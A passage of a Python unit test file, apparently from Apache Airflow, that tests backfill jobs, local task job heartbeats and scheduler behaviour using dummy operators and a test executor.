DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEquals(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEquals(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEquals(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for reschedule
# test for failed
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
